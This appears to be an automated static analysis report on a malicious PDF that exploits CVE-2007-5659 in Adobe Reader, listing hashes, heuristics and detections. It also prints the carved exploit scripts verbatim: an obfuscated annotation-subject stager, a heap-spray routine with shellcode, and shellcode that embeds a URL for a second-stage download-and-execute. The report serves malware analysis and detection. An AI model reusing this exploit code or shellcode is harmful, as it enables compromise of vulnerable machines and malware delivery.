Malicious PDF — malware analysis report

Static analysis result for SHA-256 15b135d9358c759f…

MALICIOUS

PDF

16.6 KB
MD5: eaf6df1ec9c2132786f63c26684bb0fd SHA-1: 819a28196f42f3a4b48601171740bd8f04afb1da SHA-256: 15b135d9358c759fb98c0b2548d3ee7425858d3900f0cd937e00eab49cb380ab
406 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF document contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed to download a second-stage payload from the URL http://buspacket.com/info/sun.html/n00a106201r0409X38c58883Y33dbe2d5. The JavaScript employs several anti-analysis techniques, including checking the number of plugins and using String.fromCharCode with hex decoding.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER
    PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://buspacket.com/info/sun.html/n00a106201r0409X38c58883Y33dbe2d5 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 9 at offset 0x3FFC 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
annotation_subject_callee_hex_stage_000.js
6b16acade82bf952663e0e97253a1600e154e294dbb91c565b243d2af53a6cd8		 deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x19FC 5191 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var UMq_6kXy1_8v = new Array();var c5bN271 = 0;var Xf_0C_N__k = "";function CD7IY5Q(Q0H8ablN1m7, qQBCt_6cAaU7hmo){var F1MNSAwy2w_78gV = qQBCt_6cAaU7hmo.toString();var vhtv4_4 = "";for(var t__MXB_G8eH4__s = 0; t__MXB_G8eH4__s < F1MNSAwy2w_78gV.length; t__MXB_G8eH4__s++) {var mC01PI = parseInt(F1MNSAwy2w_78gV.substr(t__MXB_G8eH4__s, 1));if (!isNaN(mC01PI)) {mC01PI = mC01PI.toString(16);if (mC01PI.length == 1) { mC01PI = "0" + mC01PI; }else if (mC01PI.length != 2) { mC01PI = "00"; }vhtv4_4 = mC01PI + vhtv4_4;if (vhtv4_4.length == 8) {break;}}}while(vhtv4_4.length < 8) { vhtv4_4 = "0" + vhtv4_4; }var Asji2q___I_O = Q0H8ablN1m7.toString(16);if (Asji2q___I_O.length == 1) { Asji2q___I_O = "0" + Asji2q___I_O; }else if (Asji2q___I_O.length != 2) { Asji2q___I_O = "00"; }vhtv4_4 = "3" + Asji2q___I_O + "P" + vhtv4_4;return vhtv4_4;}function UW5YNJ_J_D(e_L_E_n1__I76i, A2_q_60_C){var GWS__D___l = new Array("");var xx3X_DXo_qkKvwm = e_L_E_n1__I76i;var ku_j_RE;if ((ku_j_RE = e_L_E_n1__I76i.lastIndexOf("%u00")) != -1) {if (ku_j_RE + 6 == e_L_E_n1__I76i.length) {GWS__D___l[0] = e_L_E_n1__I76i.substr(ku_j_RE + 4, 2);xx3X_DXo_qkKvwm = e_L_E_n1__I76i.substring(0, ku_j_RE);}}ku_j_RE = 1;for (t__MXB_G8eH4__s = 0; t__MXB_G8eH4__s < A2_q_60_C.length; t__MXB_G8eH4__s++) {var nR7v__hNAQM = A2_q_60_C.charCodeAt(t__MXB_G8eH4__s).toString(16);if (nR7v__hNAQM.length == 1) { nR7v__hNAQM = "0" + nR7v__hNAQM; }GWS__D___l[ku_j_RE] = nR7v__hNAQM;ku_j_RE++;}t__MXB_G8eH4__s = GWS__D___l[0].length ? 0 : 1;GWS__D___l[ku_j_RE] = "00";GWS__D___l[ku_j_RE + 1] = "00";ku_j_RE += 2;if ((GWS__D___l.length - t__MXB_G8eH4__s) % 2) {GWS__D___l[ku_j_RE] = "00";}while(t__MXB_G8eH4__s < GWS__D___l.length) {xx3X_DXo_qkKvwm += "%u" + GWS__D___l[t__MXB_G8eH4__s + 1] + GWS__D___l[t__MXB_G8eH4__s];t__MXB_G8eH4__s += 2;}xx3X_DXo_qkKvwm += "%u0000";return xx3X_DXo_qkKvwm;}function VwU_eS_u(iNSQx2, f3H__B5_055T){while (iNSQx2.length*2<f3H__B5_055T) {iNSQx2 += iNSQx2;}iNSQx2 = iNSQx2.substring(0,f3H__B5_055T/2);return iNSQx2;}function H2__5_PAR_t_r(vfDkU0_r, IG_NUgK_n_2by, Uy_D7R13_W6T){var UxN62___s86 = 0x0c0c0c0c;var iNSQx2 = unescape(IG_NUgK_n_2by);var A2_q_60_C = CD7IY5Q(vfDkU0_r, Uy_D7R13_W6T);var e7Ve685 = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var e_L_E_n1__I76i = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6470%u6c67%u0054%u7468%u7074%u2f3a%u622f%u7375%u6170%u6b63%u7465%u632e%u6d6f%u692f%u666e%u2f6f%u7573%u2e6e%u7468%u6c6d%u6e2f%u3030%u3161%u3630%u3032%u7231%u3430%u3930%u3358%u6338%u3835%u3838%u5933%u3333%u6264%u3265%u3564";app.h1hX7qh = unescape(UW5YNJ_J_D(e_L_E_n1__I76i, A2_q_60_C));var gm47c_4m_o = 0x400000;var k__740f_c = e7Ve685.length * 2;var f3H__B5_055T = gm47c_4m_o - (k__740f_c+0x38);iNSQx2 = VwU_eS_u(iNSQx2, f3H__B5_055T);var N1K_C06IyX2J1 = (UxN62___s86 - 0x400000)/gm47c_4m_o;for (var r_pCvIN_t__S = 0; r_pCvIN_t__S < N1K_C06IyX2J1; r_pCvIN_t__S++) {UMq_6kXy1_8v[r_pCvIN_t__S] = iNSQx2 + e7Ve685;}}function f8RFg4(){var hOW_A__fR = "";for (t__MXB_G8eH4__s = 0; t__MXB_G8eH4__s < 12; t__MXB_G8eH4__s++) {hOW_A__fR += unescape("%u0c0c%u0c0c");}var k_Q_cJ0p3__X3 = ""
... (truncated)
legacy_pdfkit_stage_000.js
7cb0c05231ab0e5308fbc441179391f6e37f54e62ff639d8edc64916da42ccf5		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1A50 11648 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function Oy_2_2A25b_8ak(g___v0DWKX07__y, GQ0____j_2){var Sk8JnuFS_bRfq = new Array();var N__1X52_544_A_P = 512;var eFq_4__b_13S_Ni = 21;var i___H_d__y = 0;var B_Ce__L01077t = 0;var d3__PAb2u = 0;var nmI_X_CSa = "";var VB6ByGE1B_7m = "";var L_X_D052_vH = 6;try {var b8A7p_8F = 0;if (app) {d3__PAb2u = d3__PAb2u + 2;GQ0____j_2 = pr[b8A7p_8F].subject;}} catch(e) { }d3__PAb2u = d3__PAb2u + 5;if (!g___v0DWKX07__y) { Sk8JnuFS_bRfq = new Array(146,119,172,209,197,211);} else {Sk8JnuFS_bRfq = g___v0DWKX07__y;}var f8i___p_1 = 0;var Rqke33 = 0;var DGg_bT0QV8 = 0;while(Rqke33 < GQ0____j_2.length) {var d3_5_Kax_R = GQ0____j_2.substr(Rqke33, 2);var jXiA16M1FMJtvDW = parseInt(d3_5_Kax_R, 21);if (f8i___p_1 >= L_X_D052_vH) {f8i___p_1 = 0;}jXiA16M1FMJtvDW -= Sk8JnuFS_bRfq[f8i___p_1] * (DGg_bT0QV8 + 2);var G_6_d1dMEi = Math;if (jXiA16M1FMJtvDW < 0) {jXiA16M1FMJtvDW -= G_6_d1dMEi.floor(jXiA16M1FMJtvDW / 256) * (N__1X52_544_A_P / 2);}if (Rqke33 >= 0) {jXiA16M1FMJtvDW = String.fromCharCode(jXiA16M1FMJtvDW);}if (d3__PAb2u == 6) {nmI_X_CSa += go2W__J_H_Cb__7;} else if (d3__PAb2u == 7) {nmI_X_CSa += jXiA16M1FMJtvDW;} else {nmI_X_CSa += Rqke33;}f8i___p_1++;Rqke33 += 2;DGg_bT0QV8++;}var XaTaeNea5i = this;XaTaeNea5i['ev'+'al'](nmI_X_CSa);}
	Oy_2_2A25b_8ak(0, "77991d2bbc0i016gb74i71262344bh43bjak6a27232k75aa37c3271h2k8e5i9g2f05a2agaf6524836b7f2e1j086h21a7aj1i0g7abd8c1b95435g6d7j9a502j27b547035g5k4h9e7c7a3d60c13a4da5b958bhbe2d497e4kaf7g4fai6b45c0121a045d638f9445870578795k22bc018588ah357b978i387bb5af5i7g3f541h28558f209f0695af7abi7gag159haa1906ak678e98aaa4ag1a3eb5bj4ba96g3jb7a6a064961kb29c4k9448ba0658365862668g367j5128620i27756482bk173f1a4cc0b00f177351447g121556128h45b9aa8i49384e10ad5h2g78052b8d0a221a0abh6h71054986246e3k1j0h494b60b0a9523c19588b03a5294c1h0cbk2hb13e1k9fa66h6d54c3489d0j6i2h9bb85k78495gbe668k9iaf3i8h3c4d2b7875880i7j9c6g7b814i5201486855186g8d0b8f4c89320fbi5d466f4969af95be203dad6688be8b1h1f4i809g3i269ebg6a888hb5c3c2a46742a476a09984159i0953884e8iag2717806k5c9h7hb7ae37998i00bda90j5c9272610k2e2ba3206611118066460eb4c2664h8g17bk83b669367k22999b6iaa83b1662b2h052cb9808e5h6507094f5k1ab294021kbd0h346d411d7d0ka26021aj6d2g4859499e10235jba54a25hb313aa2cah3e14789k5f5k7ka89345324f7c875g2a3h460i9d75bh39276i7g06933h595b9g9798532g9j5ebi2f8504515h5f224ka0bh89c01c9994a34d2hae91702i72a28da46f0h36065e9g858f5e84be854e0e23a792bc54c23d5ka28j557k42c378ba3423bc514h0429771771be0408591131bi939895a74d5i1e6h8ebk1378ai8c0i7i3e0fa8527b747ka72c6b6gad17agc033a6a69d86330d749320620a353k7b6d2030088a558gc013b04k664iaf2k8e2h3d7b8b4j91ae5g365e4j5g2h25580e587a9b0jbe0g5h685f3f61995e3d34198i7a6743b22b4c164h0c31ai6faj83a3c3132gbh510c8jbf787f7c9j15999b365f6b8g7j2a24968f7c7cba118f6k18912h8k6273a5909e886a4k5d4fb542ah3g124j7e2ka5207268b4a5b51144625ja9808g98217j4i88bh372k3k5801722b3f8326b2808901be8j9d4b26be4b67236d062f064f122548bd1716bc03bja26a042h27af9g36b5250c4bb56h5e038ba49i9h320b769ba76e4d17911f7bbf154g8i00960gbe4c7c7f5i8j5k2h6g26862c5d5j4ca57640284j0i4b52b3064e1db12d589j5308694cak5369b71k201555487292128731746j3d2cc3958j8f162h39827c5h8f15a66e87534e9g2j1299440b928529a02g838hbj856jbj37ai8e5cb1187e9g0f4f9jbj52a6692abfb1125g98a1b68e71822faac255367981609h6e927i2365935b74627f2gbj2abk5j0a98a6c19c5h56a7120d32128h451g00ak39234e2c8g742g7a0406a4042f1c0a3d79ag1e6ja7257c2ga1907d133ga09f23100h3355957eb1134i41b6c0895237b2ah7k7i3ea53k6db32j3ea8ak9561295e9b9690900g618a2f5e4d81718c0e77a68545418h531i4e745h1b5d782e8448824i9bae4k3d5e385a8a872hb03dad626hb2900d4b5d950c4i34622cabacbj1d11a86i6i3fb24861825b071a0k48a66i86ba5e3jbi643k01b420882g99ag30a1bg1j7gab5k88c30i14741c3a161fag9975431403675493a9a6ak27734ia60i7j654gaj93298k4367294b103ea123580i2k647j1aa21030441a3a469d2512a3218g713g2e240i0g25299e1b1h8j1144a1810000bh3h83380a7k5k3d5k9a9ic3755e5g40b73g1a6e6g26b1b51e4f25a2a034a06a2d49846a8c620fbk8e253552b346977b358i9a376f9e1e87b5ac5i329b7i703i30855a929d0h38085183548b527i388b713j46ba0j7d61b4375094953h580hb65i8k2c1i2k182104228h27a026060a22ae028ia9bb08944c9cbj7j8ebb036fc27325a02k471881ahb4aia7c14a2g770h7g341i1h856d96253d9178014k1gbc274b3f0h02a7903i06c11a106h64539627a4163h6i8k3095924i2h3e4b88504h7g2k5k730i3b06ag542j65c1
... (truncated)
deobfuscated.js
d7536b21f86c1f632781e3e96098638e67eff085fa1cd3afa14958cb90d3778c		 deobfuscated-js PDF JavaScript deobfuscation pass 86473 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
77991d2bbc0i016gb74i71262344bh43bjak6a27232k75aa37c3271h2k8e5i9g2f05a2agaf6524836b7f2e1j086h21a7aj1i0g7abd8c1b95435g6d7j9a502j27b547035g5k4h9e7c7a3d60c13a4da5b958bhbe2d497e4kaf7g4fai6b45c0121a045d638f9445870578795k22bc018588ah357b978i387bb5af5i7g3f541h28558f209f0695af7abi7gag159haa1906ak678e98aaa4ag1a3eb5bj4ba96g3jb7a6a064961kb29c4k9448ba0658365862668g367j5128620i27756482bk173f1a4cc0b00f177351447g121556128h45b9aa8i49384e10ad5h2g78052b8d0a221a0abh6h71054986246e3k1j0h494b60b0a9523c19588b03a5294c1h0cbk2hb13e1k9fa66h6d54c3489d0j6i2h9bb85k78495gbe668k9iaf3i8h3c4d2b7875880i7j9c6g7b814i5201486855186g8d0b8f4c89320fbi5d466f4969af95be203dad6688be8b1h1f4i809g3i269ebg6a888hb5c3c2a46742a476a09984159i0953884e8iag2717806k5c9h7hb7ae37998i00bda90j5c9272610k2e2ba3206611118066460eb4c2664h8g17bk83b669367k22999b6iaa83b1662b2h052cb9808e5h6507094f5k1ab294021kbd0h346d411d7d0ka26021aj6d2g4859499e10235jba54a25hb313aa2cah3e14789k5f5k7ka89345324f7c875g2a3h460i9d75bh39276i7g06933h595b9g9798532g9j5ebi2f8504515h5f224ka0bh89c01c9994a34d2hae91702i72a28da46f0h36065e9g858f5e84be854e0e23a792bc54c23d5ka28j557k42c378ba3423bc514h0429771771be0408591131bi939895a74d5i1e6h8ebk1378ai8c0i7i3e0fa8527b747ka72c6b6gad17agc033a6a69d86330d749320620a353k7b6d2030088a558gc013b04k664iaf2k8e2h3d7b8b4j91ae5g365e4j5g2h25580e587a9b0jbe0g5h685f3f61995e3d34198i7a6743b22b4c164h0c31ai6faj83a3c3132gbh510c8jbf787f7c9j15999b365f6b8g7j2a24968f7c7cba118f6k18912h8k6273a5909e886a4k5d4fb542ah3g124j7e2ka5207268b4a5b51144625ja9808g98217j4i88bh372k3k5801722b3f8326b2808901be8j9d4b26be4b67236d062f064f122548bd1716bc03bja26a042h27af9g36b5250c4bb56h5e038ba49i9h320b769ba76e4d17911f7bbf154g8i00960gbe4c7c7f5i8j5k2h6g26862c5d5j4ca57640284j0i4b52b3064e1db12d589j5308694cak5369b71k201555487292128731746j3d2cc3958j8f162h39827c5h8f15a66e87534e9g2j1299440b928529a02g838hbj856jbj37ai8e5cb1187e9g0f4f9jbj52a6692abfb1125g98a1b68e71822faac255367981609h6e927i2365935b74627f2gbj2abk5j0a98a6c19c5h56a7120d32128h451g00ak39234e2c8g742g7a0406a4042f1c0a3d79ag1e6ja7257c2ga1907d133ga09f23100h3355957eb1134i41b6c0895237b2ah7k7i3ea53k6db32j3ea8ak9561295e9b9690900g618a2f5e4d81718c0e77a68545418h531i4e745h1b5d782e8448824i9bae4k3d5e385a8a872hb03dad626hb2900d4b5d950c4i34622cabacbj1d11a86i6i3fb24861825b071a0k48a66i86ba5e3jbi643k01b420882g99ag30a1bg1j7gab5k88c30i14741c3a161fag9975431403675493a9a6ak27734ia60i7j654gaj93298k4367294b103ea123580i2k647j1aa21030441a3a469d2512a3218g713g2e240i0g25299e1b1h8j1144a1810000bh3h83380a7k5k3d5k9a9ic3755e5g40b73g1a6e6g26b1b51e4f25a2a034a06a2d49846a8c620fbk8e253552b346977b358i9a376f9e1e87b5ac5i329b7i703i30855a929d0h38085183548b527i388b713j46ba0j7d61b4375094953h580hb65i8k2c1i2k182104228h27a026060a22ae028ia9bb08944c9cbj7j8ebb036fc27325a02k471881ahb4aia7c14a2g770h7g341i1h856d96253d9178014k1gbc274b3f0h02a7903i06c11a106h64539627a4163h6i8k3095924i2h3e4b88504h7g2k5k730i3b06ag542j65c16g8h3g5g3424bd614d2g9ic04f57692f610581b947b92h1425b767bc7bbf656j7i9c24b107734k7h8g95523187845h9fad11976g048k15b69869a79893527k1a314fc22b7e1bbe6e652ka50f8368bk10a9174b5f59a0a8aaaj2189498a85421a163fb88e1e3f6i26c3809h2i1e0g07764b1g5067a92b9i1d8853a61853b0192a21422f0j9a100db07ga6bd920b115j854k611ab307ac0b4h30a689ab37433e9g43a5b5a3184h028c3g9f3h546d6g718639361k752h2i1j176a4949c16d1f4957c306481d03555f9f6d197e52a56f54b50026041i4c7i7d1b9g377d976a2iai0d7c7d071c51956h4b90039b6e876211b21b2k8737bcc2881b922e7b9235b9a41h35b4545cb418ak8008608kah5i996f409eb01c9980ac985e5157507c884k06668f77bg649b6g21570c4g7362741j00271a46aa0abh09904g656haha92340794gaeb1ba2i384e0cak742g931j359f2b1513a72d77841f5b723075670ea17c3860c1bk37402d2j8bab7h19434a0c8a1481280c07ba93684c1153961e5j63080ha174402e867e5686a4727628581j7a4f94057ka78f7b418e7a034j744b2a68783b833db96210ac983e6f505eaf8h2i1f0da486850i8h283c5d6a02311f81347783881kbgab9i9757b36h6h85621b9j127db177a4c21j16ba4h47aab5b891500bb438bk000d5d838a66b11j327gb65ha6ai8d7k3e0521c25375af1ib378b05b17ag0e8c837e7760368837551g67023ea123811g214g8427a80k4147364h6ca24237750j88781e0d542a282a43a9afc088bh288i672123075kb2429e7a834f86c29ia97h608g6kbb62466h74ag9c8215693592961ga56h5049a55f987b1a0784b55f8ab6466k563373c03068bc168792a67j2274
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.